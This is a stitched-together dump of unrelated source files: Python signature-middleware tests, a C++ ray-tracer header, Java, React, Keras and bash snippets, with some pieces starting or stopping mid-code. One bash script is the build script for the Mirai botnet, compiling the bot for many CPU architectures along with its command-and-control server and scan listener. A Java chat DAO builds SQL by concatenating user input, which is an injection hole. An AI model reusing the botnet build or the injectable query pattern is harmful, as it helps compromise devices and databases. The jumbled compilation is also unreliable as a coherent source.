    response = SignatureRejectionMiddleware().process_request(request)
    assert response.status_code == 401


def test_signature_rejection_rejects_invalid_signature(rf):
    """A request carrying a bogus signature header is rejected with 401."""
    request = rf.get('/', HTTP_X_SIGNATURE='NOT-CORRECT', CONTENT_TYPE='')
    response = SignatureRejectionMiddleware().process_request(request)
    assert response.status_code == 401


def test_signature_rejection_accepts_valid_signature(rf, settings):
    """A correctly signed request passes (process_request returns None)."""
    # in practice the signature is generated on the server making the request.
    # on the requesting server, it will know the shared secret
    signer = RequestSigner(secret=SECRET)
    headers = signer.get_signature_headers(
        url='/', body='', method='GET', content_type=''
    )
    request = rf.get(
        '/',
        HTTP_X_SIGNATURE=headers[signer.header_name],
        CONTENT_TYPE='',
    )
    response = SignatureRejectionMiddleware().process_request(request)
    assert response is None


def test_signature_check_skipped(rf, settings):
    """URLs listed in URLS_EXCLUDED_FROM_SIGNATURE_CHECK bypass the check."""
    settings.URLS_EXCLUDED_FROM_SIGNATURE_CHECK = ['/']
    request = rf.get('/')
    response = SignatureRejectionMiddleware().process_request(request)
    assert response is None
// // Created by <NAME> on 1/12/18. // #ifndef TMPL8_2018_01_TRIANGLE_H #define TMPL8_2018_01_TRIANGLE_H #include "precomp.h" struct TriangleVertices{ vec3 v1 = vec3(0,0,0); vec3 v2 = vec3(0,0,0); vec3 v3 = vec3(0,0,0); }; class Triangle: public Object { public: Triangle(vec3 v1, vec3 v2, vec3 v3, vec3 color, Material mat); Intersection intersects(Ray* ray); bool shadowRayIntersects(Ray ray); vec3 getColor(); void setColor(vec3 color); vec3 getNormal(); vec3 getNormal(vec3 point); TriangleVertices getVertices(); void setVertices(vec3 v1, vec3 v2, vec3 v3); Material getMaterial() { return material; }; void getRandomPoint(vec3 &rp, unsigned int seed1, unsigned int seed2); float getArea(); vec3 color; Material material; TriangleVertices vertices; vec3 normal; bool isTriangle = true; private: }; #endif //TMPL8_2018_01_TRIANGLE_H
#!/bin/bash FLAGS="" function compile_bot { echo ">> Compiling for $1" "$1-gcc" -std=c99 $3 bot/*.c -O3 -fomit-frame-pointer -fdata-sections -ffunction-sections -Wl,--gc-sections -o release/"$2" -DMIRAI_BOT_ARCH=\""$1"\" "$1-strip" release/"$2" -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag --remove-section=.jcr --remove-section=.got.plt --remove-section=.eh_frame --remove-section=.eh_frame_ptr --remove-section=.eh_frame_hdr } if [ $# != 2 ]; then echo "!> Missing build type." echo "!> Usage: $0 <debug | release> <telnet | ssh>" exit fi if [ "$2" == "telnet" ]; then FLAGS="-DMIRAI_TELNET" elif [ "$2" == "ssh" ]; then FLAGS="-DMIRAI_SSH" fi if [ "$1" == "release" ]; then # rm -rf release if ! [ -d release ]; then mkdir -p release compile_bot i586 mirai.x86 "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot mips mirai.mips "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot mipsel mirai.mpsl "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot armv4l mirai.arm "$FLAGS -DKILLER_REBIND_SSH -static" # compile_bot armv5l mirai.arm5n "$FLAGS -DKILLER_REBIND_SSH" # compile_bot armv6l mirai.arm7 "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot powerpc mirai.ppc "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot sparc mirai.spc "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot m68k mirai.m68k "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot sh4 mirai.sh4 "$FLAGS -DKILLER_REBIND_SSH -static" compile_bot i586 miraint.x86 "-static" compile_bot mips miraint.mips "-static" compile_bot mipsel miraint.mpsl "-static" compile_bot armv4l miraint.arm "-static" # compile_bot armv5l miraint.arm5n " " # compile_bot armv6l miraint.arm7 "-static" compile_bot powerpc miraint.ppc "-static" compile_bot sparc miraint.spc "-static" compile_bot m68k miraint.m68k "-static" compile_bot sh4 miraint.sh4 "-static" echo ">> Building cnc..." 
go build -o release/cnc cnc/*.go go build -o release/scanListen tools/scanListen.go echo ">> Build release done." fi elif [ "$1" == "debug" ]; then # rm -rf debug if ! [ -d debug ]; then mkdir -p debug i586-gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.x86.dbg mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips.dbg armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm.dbg # armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7.dbg sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4.dbg gcc -std=c99 tools/enc.c -g -o debug/enc.dbg gcc -std=c99 tools/nogdb.c -g -o debug/nogdb.dbg gcc -std=c99 tools/badbot.c -g -o debug/badbot.dbg echo ">> Building cnc..." go build -o debug/cnc cnc/*.go go build -o debug/scanListen tools/scanListen.go echo ">> Build debug done." fi elif [ "$1" == "cnc" ]; then echo ">> Building cnc..." go build -o release/cnc cnc/*.go go build -o release/scanListen tools/scanListen.go echo ">> Build cnc done." else echo "Unknown parameter $1: $0 <debug | release>" fi
/*
MIT License

Copyright (c) 2021 <NAME>

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
package kchandra423.kImages;

import processing.core.PApplet;
import processing.core.PImage;

/**
 * Base implementation of {@link KImage}: stores position, rotation and the
 * reflected/reversed flags, and implements drawing on top of the concrete
 * {@link #getImage()} supplied by subclasses.
 */
abstract class AbstractKImage implements KImage {
    // Screen-space position of the image's origin.
    private float x, y;
    // Rotation in radians, kept within [0, 2*PI) by setAngle/rotate.
    private float angle;
    // Horizontal mirroring flags used by draw().
    private boolean reflected, reversed;

    protected AbstractKImage(float x, float y, float angle, boolean reflected, boolean reversed) {
        this.x = x;
        this.y = y;
        this.angle = angle;
        this.reflected = reflected;
        this.reversed = reversed;
    }

    // No-op in this base class; presumably meant to be overridden — confirm
    // against concrete subclasses.
    @Override
    public void resize(int w, int h) {

    }

    // No-op in this base class (see resize note above).
    @Override
    public void scale(float stretchX, float stretchY) {

    }

    @Override
    public int getWidth() {
        return getImage().width;
    }

    @Override
    public int getHeight() {
        return getImage().height;
    }

    /** Moves the image by the given deltas. */
    @Override
    public void translate(float delx, float dely) {
        x += delx;
        y += dely;
    }

    @Override
    public float getX() {
        return x;
    }

    @Override
    public float getY() {
        return y;
    }

    /** Moves the image to an absolute position. */
    @Override
    public void moveTo(float x, float y) {
        this.x = x;
        this.y = y;
    }

    // NOTE(review): Java's % keeps the sign of theta, so a negative input
    // stores a negative angle here — confirm whether callers rely on that.
    @Override
    public void setAngle(float theta) {
        theta %= Math.PI * 2;
        angle = theta;
    }

    @Override
    public float getAngle() {
        return angle;
    }

    @Override
    public boolean isReflected() {
        return reflected;
    }

    @Override
    public boolean isReversed() {
        return reversed;
    }

    /** Adds theta to the current angle, wrapping modulo 2*PI. */
    @Override
    public void rotate(float theta) {
        angle += theta;
        angle %= Math.PI * 2;
    }

    @Override
    public void reflect(boolean flag) {
        this.reflected = flag;
    }

    @Override
    public void reverse(boolean flag) {
        this.reversed = flag;
    }

    /**
     * Draws the image with the current position/rotation, applying a mirror
     * transform when reflected; the reversed flag changes how the mirrored
     * rotation and translation compose.
     */
    @Override
    public void draw(PApplet p) {
        p.pushMatrix();
//        float x = this.x*scaleX,y = this.y*scaleY;
        if (!reflected) {
            p.translate(x, y);
            p.rotate(angle);
        } else {
            // Mirror horizontally, then compensate the rotation/translation.
            p.scale(-1, 1);
            if (reversed) {
                p.translate(-x, y);
                p.rotate((float) (Math.PI - angle));
            } else {
                p.rotate(-angle);
                p.translate(-(x + getWidth()), y);
            }
        }
//        p.scale(scaleX, scaleY);
        p.image(getImage(), 0, 0);
        p.popMatrix();
        // NOTE(review): the two calls below draw a fixed fat point at
        // (150,150) on every frame — looks like leftover debug output;
        // confirm and remove if unintended.
        p.strokeWeight(20);
        p.point(150, 150);
    }

    @Override
    public abstract PImage getImage();

    @Override
    public abstract Object clone();
}
import React, { useState } from 'react';

import { Container, Card, TextField } from '@material-ui/core';

// Demo of three Material-UI multiline TextField variants: controlled,
// placeholder-only, and static with a default value.
export default function LivePreviewExample() {
  // Controlled value backing the first field.
  const [value, setValue] = useState('Controlled');

  const handleChange = (event) => {
    setValue(event.target.value);
  };

  return (
    <>
      <Card className="p-5 shadow-xxl">
        <Container>
          {/* Controlled field: grows up to 4 rows. */}
          <TextField
            className="m-3"
            fullWidth
            id="filled-multiline-flexible"
            label="Multiline"
            multiline
            rowsMax="4"
            value={value}
            onChange={handleChange}
          />
          {/* Uncontrolled field showing only a placeholder. */}
          <TextField
            className="m-3"
            fullWidth
            id="filled-textarea"
            label="Multiline Placeholder"
            placeholder="Placeholder"
            multiline
          />
          {/* Uncontrolled field with a fixed height and initial text. */}
          <TextField
            className="m-3"
            fullWidth
            id="filled-multiline-static"
            label="Multiline"
            multiline
            rows="4"
            defaultValue="Default Value"
          />
        </Container>
      </Card>
    </>
  );
}
#!/bin/bash
#v0.2.3
#------------------------------------------------------------------------------
# creates a package from the relative file paths specified in the .dev file
#------------------------------------------------------------------------------
# Reads an "include file" listing relative paths (one per line, '#' comments
# allowed), verifies the files exist under $product_instance_dir, and zips
# them into $product_dir with a timestamped name.  Relies on doLog/doExit/
# doRunCmdAndLog plus $product_instance_dir, $product_dir, $env_type,
# $run_unit, $product_version and $host_name being defined by the caller.
doCreateRelativePackage(){

    cd $product_instance_dir
    mkdir -p $product_dir/dat/zip
    test $? -ne 0 && doExit 2 "Failed to create $product_instance_dir/dat/zip !"

    # define default vars: include file defaults to met/.<env>.<run_unit>
    test -z ${include_file:-} && \
        include_file="$product_instance_dir/met/.$env_type.$run_unit"

    # relative file path is passed turn it to absolute one
    [[ $include_file == /* ]] || include_file=$product_instance_dir/$include_file

    test -f $include_file || \
        doExit 3 "did not found any deployment file paths containing deploy file @ $include_file"

    # second dot-separated token of the include file name is the target env
    tgt_env_type=$(echo `basename "$include_file"`|cut -d'.' -f2)
    timestamp=`date "+%Y%m%d_%H%M%S"`

    # the last token of the include_file with . token separator - thus no points in names
    zip_file_name=$(echo $include_file | rev | cut -d. -f 1 | rev)
    zip_file_name="$zip_file_name.$product_version.$tgt_env_type.$timestamp.$host_name.rel.zip"
    zip_file="$product_dir/$zip_file_name"

    # Pre-flight: make sure each listed path exists, logging hints otherwise.
    # NOTE(review): the final `&& break` stops the scan at the FIRST existing
    # file, so later missing entries are never reported here — looks like it
    # was meant to be `continue`; confirm before changing (zip -MM below
    # still catches missing files).
    ret=0
    while read f ; do
        [[ $f == '#'* ]] && continue ;
        test -d "$product_instance_dir/$f" && continue ;
        test -f "$product_instance_dir/$f" && continue ;
        test -f "$product_instance_dir/$f" || doLog 'FATAL cannot find the file: "'"$product_instance_dir/$f"'" to package it' ;
        test -f "$product_instance_dir/$f" || doLog 'ERROR search for it in the '"$include_file"' ' ;
        test -f "$product_instance_dir/$f" || doLog 'INFO if you need the file add it to the list file ' ;
        test -f "$product_instance_dir/$f" || doLog 'INFO if you do not need the file remove it from the list file ' ;
        test -f "$product_instance_dir/$f" || ret=1
        test -f "$product_instance_dir/$f" && break ;
    done < <(cat $include_file)
    doLog "DEBUG ret is $ret "
    test $ret -ne 0 && doLog "ERROR non-existend file specified in the include file: $include_file "

    # start: add the perl_ignore_file_pattern
    # Collect extra ignore patterns declared inside the include file as
    # lines of the form:  # perl_ignore_file_pattern=<regex>
    while read -r line ; do \
        got=$(echo $line|perl -ne 'm|^\s*#\s*perl_ignore_file_pattern\s*=(.*)$|g;print $1'); \
        test -z "$got" || perl_ignore_file_pattern="$got|${perl_ignore_file_pattern:-}" ;
    done < <(cat $include_file)

    # or how-to remove the last char from a string
    perl_ignore_file_pattern=$(echo "$perl_ignore_file_pattern"|sed 's/.$//')
    # NOTE(review): the default below contains the alternation branch
    # `$.*\.swo$` — the leading `$` looks misplaced (likely intended
    # `.*\.log$|.*\.swo$`); confirm before fixing, since the pattern feeds
    # `grep -vP` and a bare `$` branch can over-match.
    test -z $perl_ignore_file_pattern && perl_ignore_file_pattern='.*\.swp$|.*\.log|$.*\.swo$'

    # note: | grep -vP "$perl_ignore_file_pattern" | grep -vP '^\s*#'
    # zip MM ops -MM = --must-match
    # All input patterns must match at least one file and all input files found must be readable.
    ret=0
    cat $include_file | grep -vP $perl_ignore_file_pattern | grep -vP '^\s*#' \
        | perl -ne 's|\n|\000|g;print'| xargs -0 zip -MM $zip_file
    ret=$? ;

    if (( $ret != 0 )); then
        fatal_msg1="deleted $zip_file !!!"
        fatal_msg2="because of packaging errors !!!"
        # Remove the partial archive so a broken package is never shipped.
        rm -fv $zip_file
        doLog "FATAL $fatal_msg1"
        doLog "FATAL $fatal_msg2"
        doExit 1 "FATAL failed to create relative package"
    else
        cd $product_dir
        doLog "INFO created the following relative package:"
        doLog "INFO `stat -c \"%y %n\" $zip_file_name`"
        # Optional copy to a configured network backup location.
        if [[ ${network_backup_dir+x} && -n $network_backup_dir ]] ; then
            if [ -d "$network_backup_dir" ] ; then
                doRunCmdAndLog "cp -v $zip_file $network_backup_dir/"
                doLog "INFO with the following network backup :" && \
                doLog "INFO `stat -c \"%y %n\" \"$network_backup_dir/$zip_file_name\"`"
            else
                # NOTE(review): this branch is reached when the dir is set but
                # MISSING, yet the message says "not configured" — confirm.
                msg="skip backup as network_backup_dir is not configured"
                doLog "INFO $msg"
            fi
        fi
    fi
}
#eof doCreateRelativePackage
def solve_linear_equations(a, b, c):
    """Solve the hard-wired two-equation system for (x, y).

    x is computed as (c - b) / (a - b) and y then satisfies
    a*x + b*y = 5 (the constant 5 is baked into this routine).

    Raises ZeroDivisionError when a == b or b == 0.
    """
    first = (c - b) / (a - b)
    second = (5 - a * first) / b
    return (first, second)
# Small fully-connected classifier assembled with the Keras Sequential API.
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras.models import Sequential

model = Sequential()
model.add(Dense(64, activation='relu'))      # first hidden layer
model.add(Dropout(0.5))                      # drop half the activations during training
# NOTE(review): sigmoid on a hidden layer is unusual (relu/tanh are typical);
# confirm this is intentional.
model.add(Dense(32, activation='sigmoid'))
model.add(Dense(2, activation='softmax'))    # 2-class probability output

# categorical_crossentropy expects one-hot encoded 2-class labels.
model.compile(optimizer='adam',
              loss='categorical_crossentropy',
              metrics=['accuracy'])
import sys

# Print "<first CLI argument> World!" when an argument was supplied,
# otherwise fall back to the classic greeting.
args = sys.argv
message = args[1] + " World!" if len(args) > 1 else "Hello World!"
print(message)
package io.cattle.platform.lifecycle;

import io.cattle.platform.core.model.Instance;
import io.cattle.platform.lifecycle.util.LifecycleException;

/**
 * Allocation hooks invoked around an instance's lifecycle.
 */
public interface AllocationLifecycleManager {

    /**
     * Invoked before the instance starts; may abort startup by throwing
     * {@link LifecycleException}.
     */
    void preStart(Instance instance) throws LifecycleException;

    /** Invoked after the instance has stopped. */
    void postStop(Instance instance);

    /** Invoked after the instance has been removed. */
    void postRemove(Instance instance);

}
package com.digirati.taxman.rest.server.taxonomy.mapper;

import com.digirati.taxman.common.rdf.RdfModelBuilder;
import com.digirati.taxman.common.rdf.RdfModelException;
import com.digirati.taxman.common.rdf.RdfModelFactory;
import com.digirati.taxman.common.taxonomy.ConceptLabelExtractor;
import com.digirati.taxman.common.taxonomy.ConceptModel;
import com.digirati.taxman.common.taxonomy.ConceptRelationshipType;
import com.digirati.taxman.rest.server.taxonomy.identity.ConceptIdResolver;
import com.digirati.taxman.rest.server.taxonomy.storage.ConceptDataSet;
import com.digirati.taxman.rest.server.taxonomy.storage.record.ConceptRecord;
import com.digirati.taxman.rest.server.taxonomy.storage.record.ConceptRelationshipRecord;
import org.apache.commons.lang3.StringUtils;
import org.apache.jena.vocabulary.DCTerms;
import org.apache.jena.vocabulary.SKOS;

import javax.ws.rs.WebApplicationException;
import java.net.URI;
import java.util.ArrayList;
import java.util.UUID;
import java.util.function.BiConsumer;
import java.util.stream.Stream;

/**
 * A POJO mapper that can map between {@link ConceptModel}s and {@link ConceptDataSet}s.
 */
public class ConceptMapper {

    // Translates between concept UUIDs and their public URIs.
    private final ConceptIdResolver idResolver;
    private final RdfModelFactory factory;

    public ConceptMapper(ConceptIdResolver idResolver, RdfModelFactory modelFactory) {
        this.idResolver = idResolver;
        this.factory = modelFactory;
    }

    /**
     * Convert a database data representation to a typed RDF model.
     *
     * @param dataset The database dataset to convert.
     * @return a typed RDF model.
     * @throws WebApplicationException when the records produce invalid RDF.
     */
    public ConceptModel map(ConceptDataSet dataset) {
        try {
            var builder = factory.createBuilder(ConceptModel.class);
            var record = dataset.getRecord();
            var extractor = new ConceptLabelExtractor(record);

            builder.setUri(idResolver.resolve(record.getUuid()));
            extractor.extractTo(builder);

            if (StringUtils.isNotBlank(record.getSource())) {
                builder.addEmbeddedModel(DCTerms.source, URI.create(record.getSource()));
            }

            // Each relationship becomes an embedded concept carrying only its
            // preferred label, URI and (optionally) its source.
            for (ConceptRelationshipRecord relationship : dataset.getRelationshipRecords()) {
                var type = relationship.getType();
                var property = type.getSkosProperty(relationship.isTransitive());
                var source = relationship.getTargetSource();

                RdfModelBuilder<ConceptModel> embeddedModel =
                        factory.createBuilder(ConceptModel.class)
                                .addPlainLiteral(SKOS.prefLabel, relationship.getTargetPreferredLabel())
                                .setUri(idResolver.resolve(relationship.getTarget()));
                if (source != null) {
                    embeddedModel.addEmbeddedModel(DCTerms.source, URI.create(source));
                }

                builder.addEmbeddedModel(property, embeddedModel);
            }

            ConceptModel concept = builder.build();
            concept.setUuid(dataset.getRecord().getUuid());

            return concept;
        } catch (RdfModelException ex) {
            throw new WebApplicationException("Mapping concept from data records produced invalid RDF", ex);
        }
    }

    /**
     * Convert a typed RDF model to a database data representation.
     *
     * @param model The typed RDF model to convert.
     * @return a database data representation of the {@link ConceptModel}.
     */
    public ConceptDataSet map(ConceptModel model) {
        final UUID uuid = model.getUuid();

        var record = new ConceptRecord(uuid, model.getProjectId());
        record.setSource(model.getSource());
        record.setPreferredLabel(model.getPreferredLabel());
        record.setAltLabel(model.getAltLabel());
        record.setHiddenLabel(model.getHiddenLabel());
        record.setNote(model.getNote());
        record.setChangeNote(model.getChangeNote());
        record.setEditorialNote(model.getEditorialNote());
        record.setExample(model.getExample());
        record.setHistoryNote(model.getHistoryNote());
        record.setScopeNote(model.getScopeNote());
        record.setDefinition(model.getDefinition());

        var relationshipRecords = new ArrayList<ConceptRelationshipRecord>();

        for (var type : ConceptRelationshipType.VALUES) {
            boolean transitiveSupported = type.hasTransitiveProperty();
            Stream<ConceptModel> relationships = model.getRelationships(type, false);
            Stream<ConceptModel> transitiveRelationships =
                    transitiveSupported ? model.getRelationships(type, true) : Stream.of();

            // NOTE(review): when a target URI cannot be resolved, a brand-new
            // random UUID is minted for it — confirm this silent fallback is
            // intended rather than an error.
            BiConsumer<ConceptModel, Boolean> relationshipMapper = (resource, transitive) -> {
                var targetUri = resource.getUri();
                var targetUuid = idResolver.resolve(targetUri).orElse(UUID.randomUUID());
                var targetSource = resource.getSource();
                var relationshipRecord =
                        new ConceptRelationshipRecord(uuid, targetUuid, targetSource, type, transitive);

                relationshipRecords.add(relationshipRecord);
            };

            relationships.forEach(r -> relationshipMapper.accept(r, false));
            transitiveRelationships.forEach(tr -> relationshipMapper.accept(tr, true));
        }

        return new ConceptDataSet(record, relationshipRecords);
    }
}
# Build dicts from iterables of 2-tuples and confirm that pairs of the wrong
# length raise ValueError.  Printed output is identical to the original file.
print(dict([(1, "foo")]))

d = dict([("foo", "foo2"), ("bar", "baz")])
print(sorted(d.keys()))
print(sorted(d.values()))

# A 1-tuple and a 3-tuple are both invalid key/value pairs.
for bad in (((1,),), ((1, 2, 3),)):
    try:
        dict(bad)
    except ValueError:
        print("ValueError")
/**
 * Adapter rendering each ParseObject as a centre-cropped ImageView whose
 * picture is loaded from the object's "imageURL" field via Picasso.
 */
public class ParseObjectAdapter extends ArrayAdapter<ParseObject> {
    private List<ParseObject> parseObjects;
    private Context context;

    public ParseObjectAdapter(Context context, List<ParseObject> parseObjects) {
        super(context, 0, parseObjects);
        this.context = context;
        this.parseObjects = parseObjects;
    }

    @Override
    public View getView(int position, View convertView, ViewGroup parent) {
        ImageView imageView;
        // Reuse the recycled view when the list widget supplies one.
        if (convertView == null) {
            imageView = new ImageView(context);
            imageView.setScaleType(ImageView.ScaleType.CENTER_CROP);
        } else {
            imageView = (ImageView) convertView;
        }

        // Load image using Picasso; a placeholder shows until the fetch completes.
        String imageUrl = parseObjects.get(position).getString("imageURL");
        Picasso.get().load(imageUrl).placeholder(R.drawable.placeholder_image).into(imageView);

        return imageView;
    }
}
// imports handled by babel-loader on the web
import TodoList from './features/TodoList'
import GitHub from './features/GitHub'
// import { sum as soma, sub } from './utils/mathematics'
import * as mathematics from './utils/mathematics'
import minhaPromise from './utils/minhaPromise'

// Static helper — needs no instance.
TodoList.doSomethingNotRelatedToInstance()

const MinhaLista = new TodoList()
document.getElementById('bthAddTodo').onclick = () => {
  MinhaLista.add('Novo todo')
  MinhaLista.mostraUsuario()
}

// @babel/plugin-proposal-object-rest-spread
// Rest destructuring: `nome` is extracted, the remaining fields land in `resto`.
const usuario = {
  nome: '<NAME>',
  idade: 22,
  estado: 'Santa Catarina'
}
const { nome, ...resto } = usuario
console.log(nome)
console.log(resto)

// console.log(soma(1, 2))
// console.log(sub(10, 5))
console.log(mathematics.sum(1, 2))
console.log(mathematics.sub(10, 5))

// ES6 Promise
minhaPromise()
  .then(console.log)
  .catch(console.error)

// @babel/plugin-transform-async-to-generator
// ES8 async/await
const executaPromise = async () => {
  const resultado1 = await minhaPromise()
  console.log(resultado1)

  const resultado2 = await minhaPromise()
  console.log(resultado2)
}

executaPromise()

const gitHub = new GitHub()
import pulsar as psr


def load_ref_system():
    """ Returns 2_2_2-trifluoroacetic_acid as found in the IQMol fragment library.
        All credit to https://github.com/nutjunkie/IQmol

        The embedded block is XYZ-style geometry: element symbol followed by
        Cartesian coordinates (units presumably Angstroms — confirm against
        psr.make_system's documentation).
    """
    return psr.make_system("""
        C          0.5119       -0.1804        0.1034
        C         -0.8986        0.4734       -0.1579
        O         -1.1639        1.6412       -0.0517
        O         -1.9253       -0.3042       -0.5347
        F          1.4648        0.6901        0.4768
        F          0.9963       -0.8142       -0.9854
        F          0.4730       -1.1227        1.0689
        H         -1.6614       -1.2137       -0.6023
        """)
#! /bin/bash
# Downsize the master logos to something more sensible
# Requires pngcrush and imagemagick
# e.g.
# macOS: brew install pngcrush imagemagick
# Ubuntu: sudo apt-get install pngcrush imagemagick
#
# Fixes over the original:
#  - abort if the logo directory is missing instead of processing the cwd
#  - quote "$FILENAME" in the pngcrush call (was unquoted)
#  - $(...) instead of backticks

cd ./logo || exit 1

for PHOTO_PATH in ./masters/*.png; do
    FILENAME=$(basename "$PHOTO_PATH")
    # "500>" shrinks only images wider than 500px; smaller ones are untouched.
    convert "$PHOTO_PATH" -resize "500>" "$FILENAME"
    # -ow: overwrite in place with the crushed PNG.
    pngcrush -ow "$FILENAME"
done
# Evaluate a fine-tuned language model on the WikiText-103 validation split
# with HuggingFace's run_language_modeling example script.
# Batch size 1 with --dataloader_drop_last; --augmentation_function and
# --eval_function name project-specific hooks (presumably added to the local
# transformers fork — confirm they exist in that checkout).
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/512+512+512-N-VB-ADJ/7-model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/512+512+512-N-VB-ADJ/7-1024+0+512-SS-N-VB-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_sentences_remove_all_but_nouns_and_verbs_first_two_thirds_sixth --eval_function penultimate_sixth_eval
/* jshint indent: 1 */ module.exports = function(sequelize, DataTypes) { return sequelize.define('fieldedits', { recid: { type: DataTypes.INTEGER, allowNull: false, primaryKey: true, autoIncrement: true, field: 'RECID' }, filename: { type: DataTypes.CHAR, allowNull: true, field: 'FILENAME' }, pkey: { type: DataTypes.INTEGER, allowNull: true, defaultValue: 'CREATE DEFAULT DF_EmptyInteger AS 0; ', field: 'PKEY' }, chgappr: { type: DataTypes.CHAR, allowNull: true, field: 'CHGAPPR' }, editdate: { type: DataTypes.DATE, allowNull: true, field: 'EDITDATE' }, edittime: { type: DataTypes.CHAR, allowNull: true, field: 'EDITTIME' }, beforevalue: { type: DataTypes.STRING, allowNull: true, field: 'BEFOREVALUE' }, control: { type: DataTypes.CHAR, allowNull: true, field: 'CONTROL' }, aftervalue: { type: DataTypes.STRING, allowNull: true, field: 'AFTERVALUE' } }, { tableName: 'FIELDEDITS', timestamps: false }); };
#!/bin/bash
# Script to deploy a very simple web application.
# The web app has a customizable image and some text.
#
# Expects PLACEHOLDER (image host), WIDTH and HEIGHT to be set in the
# environment before this runs — presumably by the provisioner; confirm.
# Writes straight to the default Apache document root.

cat << EOM > /var/www/html/index.html
<html>
  <head><title>Meow!</title></head>
  <body>
  <div style="width:800px;margin: 0 auto">

  <!-- BEGIN -->
  <center><img src="http://${PLACEHOLDER}/${WIDTH}/${HEIGHT}"></img></center>
  <center><h2>Meow World!</h2></center>
  Welcome to Zeb's app.  Dogs are superior to cats in all ways.
  <!-- END -->

  </div>
  </body>
</html>
EOM

echo "Script complete."
<reponame>matthewlong29/partyr-service package com.partyrgame.chatservice.dao.impl; import java.util.List; import com.partyrgame.chatservice.dao.ChatDao; import com.partyrgame.chatservice.dao.impl.mapper.ChatRowMapper; import com.partyrgame.chatservice.model.ChatMessage; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.jdbc.core.JdbcTemplate; import org.springframework.stereotype.Repository; import lombok.extern.slf4j.Slf4j; @Slf4j @Repository public class ChatDaoImpl implements ChatDao { @Autowired JdbcTemplate jdbcTemplate; @Autowired ChatRowMapper chatRowMapper; /** * insertMessage. */ public int insertChatMessage(ChatMessage chatMessage) { String query = "CALL `partyrdb`.`save_chat_message`('" + chatMessage.getUsername() + "', '" + chatMessage.getContent() + "', '" + chatMessage.getTimeOfMessage() + "');"; log.debug(query); try { return jdbcTemplate.update(query); } catch (Exception e) { log.error("unable to save chat message {}; error: {}", chatMessage.getContent(), e.getMessage()); } return jdbcTemplate.update(query); } /** * getMessages. */ public List<ChatMessage> getChatMessages() { String query = "CALL `partyrdb`.`get_all_chat_messages`();"; log.debug(query); return jdbcTemplate.query(query, chatRowMapper); } }
# Pin the JetBot software version (JetPack 4.4) for the enable scripts below.
export JETBOT_VERSION=jp44

# Optional first argument: directory Jupyter should serve.
JUPYTER_WORKSPACE=${1:-$HOME} # default to $HOME

# Enable each subsystem in turn.
./display/enable.sh
./camera/enable.sh
./jupyter/enable.sh $JUPYTER_WORKSPACE
#!/bin/bash
# -----------------------------------------
# load environment variables
# allow apps to specify cgo flags. The literal text '${build_dir}' is substituted for the build directory

# Manifest locations for each supported Go dependency tool inside the app
# being built (${build} is expected to be set by the caller — confirm).
godepsJSON="${build}/Godeps/Godeps.json"
vendorJSON="${build}/vendor/vendor.json"
glideYAML="${build}/glide.yaml"

steptxt="----->"
YELLOW='\033[1;33m'
RED='\033[1;31m'
NC='\033[0m' # No Color
CURL="curl -s -L --retry 15 --retry-delay 2" # retry for up to 30 seconds

# Yellow warning line on stdout.
warn() {
    echo -e "${YELLOW} !! $@${NC}"
}

# Red error line on stderr.
err() {
    echo -e >&2 "${RED} !! $@${NC}"
}

step() {
    echo "$steptxt $@"
}

# Begin a step without a trailing newline; pair with finished().
start() {
    echo -n "$steptxt $@... "
}

finished() {
    echo "done"
}

# Export the whitelisted build-config variables from one-file-per-variable
# env_dir (Heroku style).  The literal '${build_dir}' inside a value is
# replaced with the real build directory.
loadEnvDir() {
    local env_dir="${1}"
    if [ ! -z "${env_dir}" ]
    then
        mkdir -p "${env_dir}"
        env_dir=$(cd "${env_dir}/" && pwd)
        for key in CGO_CFLAGS CGO_CPPFLAGS CGO_CXXFLAGS CGO_LDFLAGS GO_LINKER_SYMBOL GO_LINKER_VALUE GO15VENDOREXPERIMENT GOVERSION GO_INSTALL_PACKAGE_SPEC GO_INSTALL_TOOLS_IN_IMAGE GO_SETUP_GOPATH_IN_IMAGE
        do
            if [ -f "${env_dir}/${key}" ]
            then
                export "${key}=$(cat "${env_dir}/${key}" | sed -e "s:\${build_dir}:${build}:")"
            fi
        done
    fi
}

# Set `ver` from $GOVERSION, falling back to $DefaultGoVersion (defined
# elsewhere in the buildpack) with a warning.
setGoVersionFromEnvironment() {
    if test -z "${GOVERSION}"
    then
        warn ""
        warn "'GOVERSION' isn't set, defaulting to '${DefaultGoVersion}'"
